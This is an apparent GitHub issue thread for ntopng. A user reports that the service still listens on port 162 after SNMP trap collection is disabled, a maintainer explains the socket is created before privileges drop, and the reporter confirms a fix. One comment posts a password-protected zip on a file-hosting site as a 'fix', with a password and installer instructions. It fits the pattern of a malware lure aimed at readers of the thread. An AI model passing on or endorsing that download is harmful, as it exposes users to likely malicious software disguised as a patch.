### ISSUE TITLE
Unable to disable SNMP trap collection

### ISSUE THREAD

**Issue by mcodato** [ntop/ntopng#8683]
**Environment**:
* OS name: RHEL 8.10
* Architecture: x86_64
* ntopng version/revision: 6.2.240828

**What happened**:
We noticed that ntopng still listens on port 162 even if the `SNMP trap collection` flag is disabled on the UI.

**How did you reproduce it?**
1. Disable the  `SNMP trap collection` 
2. Restart ntopng
3.  netstat -nlp  | grep 162

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cardigliano** [comment]
ntopng is now able to collect SNMP traps. In order to do this it has to listen on port 162. Currently there is a runtime pref for enabling/disabling trap collection, however since ntopng drops privileges, the socket is created in any case before changing the user, the pref only stops message polling. We should change this baheviour to address this issue.

**Comment by mcodato** [comment]
I confirm that it has been solved, thank you for the fast fix
